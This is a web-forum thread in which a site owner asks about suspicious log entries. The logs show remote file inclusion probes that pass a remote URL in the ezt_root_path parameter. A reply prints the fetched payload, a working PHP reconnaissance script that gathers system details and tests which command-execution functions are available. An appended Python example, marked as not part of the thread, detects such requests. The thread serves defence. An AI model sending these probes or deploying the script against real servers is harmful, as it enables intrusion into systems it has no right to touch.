Am I being hacked and what are they doing?

chucklechuck

Not being too up on hacking I don't really know what this all means but doesn't look good. Anybody have any advice?

Thanks in advance
Code:
72.55.176.232, vm-weblinux01.axialdev.net
Mozilla/3.0 (OS/2; U)
December 25, 2008 12:40:46  /golf-gift/golf-tickets//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:46  /golf-gift//functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:46  //functions/anti-hack.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57  /golf-gift/golf-tickets//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57  //ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
December 25, 2008 12:40:57  /golf-gift//ezt/common.php?ezt_root_path=http://vennom.t35.com/idfell.txt???
 
At a guess that's a script running against your server hoping that you have one of the applications it's testing for installed.

It appears that they are trying to download idfell.txt down onto your box. The file contains:

Code:
<?php
//FeeLCoMz Response
$pwd1 =	@getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 =	@getenv("SERVER_SOFTWARE");
$php1 =	@phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1=	@diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used =	ConvertBytes($all1-$free1);
$free =	ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

echo "FeeLCoMz".$sf."<br>";
echo "uname -a:	$un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software:	$sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;

?>

which is getting various things such as PHP version, whether safe mode is on and whether the script can run system commands (such as exec / passthru).

It may be a script to check to see what else the hacker could run if that script successfully got on your box.

May be worth scanning your server to see if that file is on there anywhere.
 
Thanks for response. Checked files stored and can't see anything new but this is hosted on a shared Hostgator server. Will keep my eye out anyway.
 
It's probably just an automated scan that is going across the IP range you are on :)
Let Hostgator worry about the backend ;)
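
Added example, not part of any post in this thread: a Python check that flags the pattern visible in the log above, a query parameter whose value is a remote URL, and groups the probed script paths by parameter and URL. The six probe lines are copied from the first post, the last sample line is constructed for contrast, and the function names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Request lines copied from the log in the first post, plus one
# constructed benign request for contrast.
PROBE = "?ezt_root_path=http://vennom.t35.com/idfell.txt???"
SAMPLE_REQUESTS = [
    "/golf-gift/golf-tickets//functions/anti-hack.php" + PROBE,
    "/golf-gift//functions/anti-hack.php" + PROBE,
    "//functions/anti-hack.php" + PROBE,
    "/golf-gift/golf-tickets//ezt/common.php" + PROBE,
    "//ezt/common.php" + PROBE,
    "/golf-gift//ezt/common.php" + PROBE,
    "/golf-gift/index.php?page=2",  # constructed, benign
]

REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def rfi_findings(request):
    """Return (script, parameter, remote_url) for every query parameter
    whose value is a remote URL."""
    # Split on the first '?' by hand: urlsplit() would read a leading
    # '//functions' as a network location instead of a path.
    path, _, query = request.partition("?")
    script = re.sub(r"/{2,}", "/", path)  # collapse the doubled slashes
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME.match(value):
            # Drop the trailing '?' padding so identical probes group together.
            findings.append((script, name, value.strip().rstrip("?")))
    return findings


def summarise(requests):
    """Map (parameter, remote_url) to the sorted list of scripts probed."""
    grouped = defaultdict(set)
    for request in requests:
        for script, name, url in rfi_findings(request):
            grouped[(name, url)].add(script)
    return {key: sorted(scripts) for key, scripts in grouped.items()}


if __name__ == "__main__":
    for (param, url), scripts in summarise(SAMPLE_REQUESTS).items():
        print(f"{param} -> {url}")
        for script in scripts:
            print("   ", script)
```

Any script path it reports that actually exists on the server is the one to review for how it uses that parameter.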
 